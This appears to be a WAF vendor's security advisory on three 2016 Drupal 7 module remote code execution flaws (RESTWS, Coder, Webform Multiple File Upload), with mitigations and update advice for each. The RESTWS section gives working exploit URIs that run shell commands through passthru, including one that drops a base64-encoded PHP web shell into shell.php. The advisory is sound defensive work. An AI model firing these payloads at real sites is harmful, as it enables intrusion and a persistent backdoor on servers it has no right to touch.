(info) Page non traduite. Anglais uniquement.

On 12th July, 2016, Drupal announces three highly critical remote execution vulnerabilities on contributed modules.

Modules concerned are:

  • RESTWS
  • Coder
  • Webform Multiple File Upload

Only Drupal version 7.x and sites using those modules are affected. Drupal core is not affected.

Highly Critical: RESTWS

Description

This module enables you to expose Drupal entities as RESTful web services.

RESTWS alters the default page callbacks for entities to provide additional functionality.

A vulnerability in this approach allows an attacker to send specially crafted requests resulting in arbitrary PHP execution.

There are no mitigating factors. This vulnerability can be exploited by anonymous users.

Source: https://www.drupal.org/node/2765567

Module exploits

The following exploit has been tested in your labs with the following configuration :

  • Drupal 7.50
  • RESTWS module 2.5
  • Entity module (needed by RESTWS)
  • Taxonomy module
Vulnerable URI
[drupal_path]/?q=taxonomy_vocabulary/[random_string]/passthru/[bash_command_payload]

We will use the php function "passthru" to execute system commands on the remote server :

Directory listing

We send a payload with a simple directory listing command :

ls -al
URI
http://drupal.local/drupal-7.50/?q=taxonomy_vocabulary/AbCdEfGh/passthru/ls%20-la

The server returns directory contents :

Php Shell upload

The following payload will create a file named "shell.php" then fill it with a php shell (base64 encoded) :

touch shell.php;echo PD9waHAKZWNobyhzeXN0ZW0oJF9HRVRbJ2NtZCddKSk7Cj8+ | base64 -d > shell.php
URI
http://drupal.local/drupal-7.50/?q=taxonomy_vocabulary/AbCdEfGh/passthru/touch%20shell.php%3Becho%20PD9waHAKZWNobyhzeXN0ZW0oIiRfR0VUW2NtZF0iKTsKPz4%3D%20%7C%20base64%20-d%20%3E%20shell.php

Payload blocked by the ICX Engine :

With DenyAll WAF in front of a vulnerable Drupal web site, exploitation payloads are detected and blocked by the ICX engine (Drupal security template).

Source: https://github.com/rapid7/metasploit-framework/pull/7108

Solution

  • In the case of an exploit passing through the ICX Engine, a negative rule can be created to mitigate and block any GET Vars containing "taxonomy_vocabulary/".
  • Use the web services firewall with the a XML parsing node or the JSON to table node before the ICX Security Engine.
    See the worklow "I-Sentry Web Services Default" (provided by default) or the use case JSON firewall.
  • Manage access on the RESTful web services by using the Web SSO or IP restrictions.
  • Update the module to the latest version (RESTful Web Services 7.x-2.6 or 7.x-1.7).

Highly Critical: Coder

Description

The Coder module checks your Drupal code against coding standards and other best practices. It can also fix coding standard violations and perform basic upgrades on modules.

The module doesn't sufficiently validate user inputs in a script file that has the php extension. A malicious unauthenticated user can make requests directly to this file to execute arbitrary php code.

There are no mitigating factors. The module does not need to be enabled for this to be exploited. Its presence on the file system and being reachable from the web are sufficient.

Source: https://www.drupal.org/node/2765575

Solution

Be careful, the module does not need to be enabled for exploit.

  • Restrict the access to the module path "/modules/coder" and especially the script "/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php"
  • Restrict PHP file access, except the main index.php or other mandatory pages ending by ".php".
  • Manage access to the Drupal administration section by using the Web SSO or IP restrictions.
  • Update the module to the latest version (Coder 7.x-1.3 or Coder 7.x-2.6).

Critical: Webform Multiple File Upload

Description

The Webform Multiple File Upload module allows users to upload multiple files on a Webform.

The Webform Multifile File Upload module contains a Remote Code Execution (RCE) vulnerability where form inputs will be unserialized and a specially crafted form input may trigger arbitrary code execution depending on the libraries available on a site.

This vulnerability is mitigated by the fact that an attacker must have the ability to submit a Webform with a Multiple File Input field. Further, a site must have an object defined with methods that are invoked at wake/destroy that include code that can be leveraged for malicious purposes. Drupal 7 Core contains one such class which can be used to delete arbitrary files, but contributed or custom classes may include methods that can be leveraged for RCE.

Note: this vulnerability exists in the Webform Multiple File Upload (webform_multifile) module. There is a similarly named module Webform Multiple File (webform_multiple_file) which is not related to this issue.

Source: https://www.drupal.org/node/2765573

Solution

Uploaded files from the module are serialized and DenyAll WAF or i-Suite can not unserialized php objects. The best way to protect a Drupal backend is to:

  • Manage access to the upload form of the module by using the Web SSO or IP restrictions.
  • Update the module to the latest version (Webform Multiple File Upload 7.x-1.4).

  • No labels